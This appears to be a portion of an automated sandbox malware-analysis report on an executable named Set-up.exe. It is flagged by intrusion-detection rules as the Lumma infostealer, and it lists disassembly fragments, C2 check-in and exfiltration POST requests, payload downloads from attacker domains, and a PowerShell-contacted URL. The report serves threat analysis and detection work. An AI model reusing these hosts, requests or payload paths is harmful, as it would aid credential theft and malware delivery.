              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-06FFCEB4h]0_2_0069A795
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]0_2_006BA85E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_006AE805
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_006B68CE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-726811CBh]0_2_006A894E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+516D2615h]0_2_006A49E3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_006AC9DE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi+10h]0_2_006BA9B9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000000A8h]0_2_006969B5
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esi+18h], ecx0_2_0069CA3E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53BABCE5h0_2_0068EAE1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-63003FA5h]0_2_006BAAAA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov eax, ebx0_2_006C0B3E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 56ADC53Ah0_2_006C0B3E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then lea eax, dword ptr [ebx+04h]0_2_00698B3B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, ecx0_2_00698B3B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EABBD981h0_2_0068EC5C
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_0069CC29
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00688CDE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, ecx0_2_0069AD9E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, eax0_2_0069AD9E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, eax0_2_0069AD9E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0000027Ch]0_2_006ACEDE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi-4E73082Eh]0_2_006AEEA7
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi-4E73082Eh]0_2_006AEF57
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0069CFEA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi-4E73082Eh]0_2_006AEFBB
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then jmp eax0_2_006BF09E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]0_2_0069914C
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+24h]0_2_0068F180
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then add eax, 00001000h0_2_00699232
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [ecx], dl0_2_00699232
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi+04h]0_2_006BF56E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+000002A8h]0_2_006995AF
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx-459A27C1h]0_2_0068F5BE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], DA026237h0_2_006A56BE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_006AD75A
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov eax, edx0_2_0069770E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_0069587E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_006A7835
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then jmp eax0_2_006AB9BC
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, ecx0_2_0069DB71
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx]0_2_006A7B1E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_006A5CAD
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then jmp eax0_2_006A5C8C
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2B88B6B5h]0_2_00699D39
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov esi, edx0_2_0069DDE2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00695EDD
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then test eax, eax0_2_006B9F7E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_006ABF4E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_006A5F53
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0068DF56
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp al, 20h0_2_00683F35
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+02h]0_2_006A3F1E

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 104.21.37.128:443
              Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.5:49720
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=35EJJUQYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12773Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LZ75PTAWC83KN3CTYS5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WP6GKXANLN3P9BWPPONUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20571Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=72U8ILPE5UCMOVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1243Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5MC82W35TARUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1057Host: laborersquei.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: laborersquei.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: laborersquei.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: dfgh.online
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
              Source: Set-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftc
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Set-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/Tj
              Source: Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215763752.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000003.00000002.2252728333.0000000004090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
